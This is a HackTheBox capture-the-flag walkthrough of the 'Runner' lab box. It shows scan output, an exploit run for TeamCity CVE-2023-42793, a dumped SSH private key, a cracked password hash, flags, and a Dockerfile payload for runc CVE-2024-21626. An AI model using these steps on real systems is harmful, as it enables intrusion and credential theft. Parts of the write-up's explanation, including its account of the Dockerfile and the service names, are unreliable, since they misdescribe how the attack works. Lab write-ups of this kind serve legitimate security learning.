Welcome! It is time to look at the Runner machine on HackTheBox. I am making these walkthroughs to keep myself motivated to learn cyber security and ensure that I remember the knowledge gained by playing HTB machines.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Level — Medium
Machine URL : Hack The Box :: Hack The Box
About Runner — Runner is a medium difficulty Linux box that contains a vulnerability ([CVE-2023–42793](https://nvd.nist.gov/vuln/detail/CVE-2023-42793)) in `TeamCity`. This vulnerability allows users to bypass authentication and extract an API token, which can be used to enable debug features for executing system commands. By gaining access to a `TeamCity` docker container and compressing the `HSQLDB` database files, we can extract credentials for the user `matthew` and find an `SSH` key for `john`. After cracking the password, we can authenticate on the host filesystem. Upon inspecting the `/etc/hosts` file, we discover a running `Portainer` instance. Using `matthew's` credentials, we access the subdomain externally. While authenticated, we find that we can create images, but our privileges are limited. After checking the version of `runc` on the host, we exploit a vulnerability ([CVE-2024–21626](https://nvd.nist.gov/vuln/detail/CVE-2024-21626)) through the image build function of `Portainer`, which allows us to create a SUID bash file on the host.
Enumeration
To kick off this box, let’s run a Nmap scan to see what services and ports are open.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -A -Pn 10.10.11.13
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 15:54 EDT
Nmap scan report for runner.htb (10.10.11.13)
Host is up (0.21s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
8000/tcp open nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/29%OT=22%CT=1%CU=43760%PV=Y%DS=2%DC=T%G=Y%TM=66A7
OS:F3A0%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(SP=100%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)SEQ(SP=100%GCD=1%ISR=10B%TI=Z%CI
OS:=Z%II=I%TS=A)SEQ(SP=101%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST1
OS:1NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53
OS:CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T
OS:=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T
OS:2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=4
OS:0%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=16
OS:4%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 163.43 ms 10.10.14.1
2 163.61 ms runner.htb (10.10.11.13)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.79 secondsThe scan shows that the ports for TCP (22) & SSH Service is Running, TCP (80) & TCP (8000) are open.
22 (SSH) & 80 (Apache) 8000 (Nagios software)
Let’s add Runner host to our /etc/hosts file.
echo "10.10.11.13 runner.htb" | sudo tee -a /etc/hostsWeb Enumeration
When we type IP on Firefox, we see there is a web page which shows Welcome to RUNNER maintained by runner.htb open that link and start fuzzing that link.
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://runner.htb/ -H "Host: FUZZ.runner.htb" -fs 154
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://runner.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.runner.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 154
________________________________________________
teamcity [Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 172ms]
:: Progress: [100000/100000] :: Job [1/1] :: 144 req/sec :: Duration: [0:09:01] :: Errors: 0 ::FFUF — ‘teamcity’ subdomain found
Let’s add Runner host again to our /etc/hosts file.
echo "10.10.11.13 teamcity.runner.htb" | sudo tee -a /etc/hostsWeb Exploitation
Open the HTTP link in a new tab.
http://teamcity.runner.htb/login.html
We got exploit for TeamCity version 2023.05.3.
TeamCity Admin Account Creation CVE-2023-42793
Exploitation
We can see that here is the version 2023.05.3 (build 129390)
I found this exploit for the CVE-2023–42793
Then execute the exploit.
┌──(kali㉿kali)-[~/CVE-2023-42793]
└─$ python CVE-2023-42793.py -u teamcity.runner.htb
[+] http://teamcity.runner.htb/login.html [H454NSec4372:@H454NSec]
So finally, we got the credentials.
After login we will see this webpage.
We logged in with credentials and when I checked the Administration page to find that there are 2 Users (John & Matthew)
And also, I found that I am able to get a Backup.
As we already know two usernames we started to check if we can find credentials for them from the backup file we got and by checking its content we found a ssh private key in the /config/projects/AllProjects/pluginData/ssh_keys directory and a hashed password for Matthew and john in backup/database_dump/users.
After extraction we will be see this in zip file.
┌──(kali㉿kali)-[~/…/projects/AllProjects/pluginData/ssh_keys]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
KgK8c9z2ecgZsAAAALam9obkBydW5uZXI=
-----END OPENSSH PRIVATE KEY-----Privilege Escalation
Then with chmod 600 Runner we can log in as john {Administrator}.
ssh -i Runner john@10.10.11.13
User.txt — 9ca8172f168764e24fa49380b24b6a1c
So, we get the user.txt
After Enumerating we found that in the /etc/hosts file, you can find a new subdomain of Portainer.
Let’s add Runner host again to our /etc/hosts file.
echo "10.10.11.13 portainer-administration.runner.htb" | sudo tee -a /etc/hostsOpen the HTTP link in a new tab.
http://portainer-administration.runner.htb/#!/auth
There are a login panel, we can use the matthew credentials for log in.
We can crack the hash using John.
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em
User: matthew
Pass: piper123
So finally, we got the credentials.
After login we will see this webpage.
Create an image.
http://portainer-administration.runner.htb/#!/1/docker/images/buildAnd in Web Editor method, put
FROM ubuntu
WORKDIR /proc/self/fd/8
RUN cat ../../../../root/root.txtThis is a Dockerfile instruction, which is used to create a Docker image. Let’s break down what each line does:
1. FROM ubuntu:
— This line tells Docker to use the official Ubuntu image as the base image for our new image.
2. WORKDIR /proc/self/fd/8:
— This line sets the working directory in the container to /proc/self/fd/8.
— /proc/self/fd is a special directory in Linux that contains file descriptors for the current process.
— fd/8 refers to file descriptor 8, which is likely a pipe or a socket.
3. RUN cat ../../../../root/root.txt:
— This line runs the cat command to print the contents of the file root.txt located in the /root/root.txt directory.
— The ../../../../ is a relative path that traverses up the directory tree:
— ../ goes up one directory level (from /proc/self/fd/8 to /proc/self/fd)
— ../ goes up another level (from /proc/self/fd to /proc/self)
— ../ goes up another level (from /proc/self to /proc)
— ../ goes up another level (from /proc to /)
— /root/root.txt is the absolute path to the file
In summary, this Docker file instruction:
- Uses an Ubuntu base image
- Sets the working directory to a file descriptor (likely a pipe or socket)
- Runs a command to print the contents of a file located in the /root/root.txt directory
Note: The use of /proc/self/fd/8 as a working directory is unconventional and might be used for specific use cases, such as interacting with a process’s file descriptors.
Then, build the image and get the root.txt.
Hehe!!! Finally, we got the root flag.
Root.txt — f8a769de3e84f5b8e0a2b8047ebb0e06
I hope you enjoyed this writeup! Happy Hacking :)
Follow me on below Social Media:
- LinkedIn: Reju Kole
2. Instagram: reju.kole.9
3. Respect me On HackTheBox! : W40X
4. Check My TryHackMe Profile : TryHackMe | W40X
5. Twitter | X : @Mr_W40X
6. GitHub : W40X | Reju Kole | Security Researcher
incase you need any help feel free to message me on my social media handles.
